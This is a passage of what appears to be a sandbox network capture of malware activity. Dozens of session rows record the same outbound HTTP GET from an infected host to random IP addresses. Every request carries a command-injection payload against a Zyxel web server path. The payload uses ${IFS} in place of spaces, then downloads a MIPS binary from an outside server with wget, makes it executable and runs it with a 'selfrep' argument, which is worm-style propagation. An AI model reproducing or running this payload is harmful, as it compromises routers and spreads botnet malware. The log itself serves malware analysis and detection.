                                                      Feb 2, 2024 06:35:42.401046038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1774192.168.2.144449062.210.11.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401073933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1775192.168.2.1434508193.120.238.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401113033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1776192.168.2.1439794153.40.241.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401150942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1777192.168.2.1437388196.49.46.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401184082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1778192.168.2.143286487.143.100.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401221037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1779192.168.2.1449832169.114.240.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401246071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1780192.168.2.146073473.150.218.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401293039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1781192.168.2.1439914131.35.118.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401315928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1782192.168.2.1447934147.242.10.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401374102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1783192.168.2.143652036.145.180.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401393890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1784192.168.2.1445798117.247.140.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401447058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1785192.168.2.1438742209.219.220.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401490927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1786192.168.2.1454650150.101.18.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401521921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1787192.168.2.1437430208.162.207.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401570082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1788192.168.2.1436084163.166.220.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401627064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1789192.168.2.1443040164.44.139.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401629925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1790192.168.2.1457866103.110.137.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401675940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1791192.168.2.144011863.189.135.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401711941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1792192.168.2.145354070.15.119.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401747942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1793192.168.2.1435414102.203.136.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401772022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1794192.168.2.1451588192.126.233.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401793003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1795192.168.2.1446844178.69.70.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401854992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1796192.168.2.145967013.217.0.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401907921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1797192.168.2.1440292191.219.127.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401941061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1798192.168.2.145993281.118.214.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.401983976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1799192.168.2.1441556190.223.43.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402034044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1800192.168.2.1443788125.131.116.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402065992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1801192.168.2.143723097.109.132.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402106047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1802192.168.2.1454670172.97.156.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402127028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1803192.168.2.143360672.152.60.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402163029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1804192.168.2.145689693.244.194.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402209044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1805192.168.2.144252491.70.100.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402229071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1806192.168.2.144599651.161.202.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402311087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1807192.168.2.1448800152.138.119.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402345896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1808192.168.2.1455324183.200.154.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402374029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1809192.168.2.1450858203.78.104.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402400017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1810192.168.2.145862040.135.113.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402441978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1811192.168.2.144237037.248.51.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402473927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1812192.168.2.145407296.38.116.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402529955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1813192.168.2.1454790201.131.91.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402551889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1814192.168.2.144828647.171.248.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402596951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1815192.168.2.143896847.203.166.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402635098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1816192.168.2.1445242223.41.76.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402671099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1817192.168.2.1432956166.141.98.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402713060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1818192.168.2.1455892133.43.61.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402754068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1819192.168.2.1458714175.43.44.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402776957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1820192.168.2.143417069.18.30.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402820110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1821192.168.2.1444730152.84.108.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402864933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1822192.168.2.145740885.188.248.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402925014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1823192.168.2.143883492.77.108.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.402971029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1824192.168.2.1438076152.149.151.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403002977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1825192.168.2.145338287.96.40.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403054953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1826192.168.2.1440228207.157.183.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403115034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1827192.168.2.1452186155.28.201.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403141975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1828192.168.2.1459850167.228.130.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403170109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1829192.168.2.1441606153.176.146.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403194904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1830192.168.2.1444022211.110.114.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403250933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1831192.168.2.143565414.63.156.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403285027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1832192.168.2.1434056103.95.185.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403316021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1833192.168.2.145684877.151.125.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403337955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1834192.168.2.1450848117.170.2.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403398037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1835192.168.2.1434820202.149.43.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:42.403448105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1836192.168.2.145225846.104.147.7443
                                                      TimestampBytes transferredDirectionData
